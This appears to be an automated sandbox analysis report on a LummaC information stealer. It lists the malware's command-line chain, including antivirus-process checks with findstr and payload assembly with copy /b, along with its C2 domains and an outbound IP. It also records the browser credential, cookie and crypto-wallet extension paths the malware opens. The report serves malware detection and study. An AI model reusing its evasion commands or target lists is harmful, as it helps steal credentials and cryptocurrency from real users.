Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Climb.com, 0000000E.00000002.2525259891.00000000018B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: spuriotis.click

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

14_2_004E1B4D

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0048338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

14_2_0048338B

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004EBBED SendInput,keybd_event,

14_2_004EBBED

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004EEC6C mouse_event,

14_2_004EEC6C

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004E14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

14_2_004E14AE

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004E1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

14_2_004E1FB0

Source: Climb.com, 0000000E.00000000.2172441117.0000000000543000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2322520245.0000000004675000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Alt.11.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ZTM2pfyhu3.exe, ZTM2pfyhu3.exe, 00000000.00000002.2142862831.000000000093B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: Climb.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004A0A08 cpuid

14_2_004A0A08

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004DE5F4 GetLocalTime,

14_2_004DE5F4

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004DE652 GetUserNameW,

14_2_004DE652

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004BBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

14_2_004BBCD2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

2_2_00406831

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe
Source: Climb.com, 0000000E.00000003.2479602813.0000000004178000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Climb.com, 0000000E.00000003.2448360045.0000000004182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: llets/Electrum-LTC
Source: Climb.com, 0000000E.00000003.2448360045.0000000004182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: llets/ElectronCashx
Source: Climb.com, 0000000E.00000003.2448360045.0000000004182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rue},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojp
Source: Climb.com, 0000000E.00000003.2448360045.0000000004182000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: majoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnplgbn","ez":"Sub"},{"en":"mopnmbcafieddcagagdcbnhejhlodfdd","ez":"PolkadotJS"
Source: Climb.com, 0000000E.00000003.2479602813.0000000004178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49713 -> 185.121.15.192:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
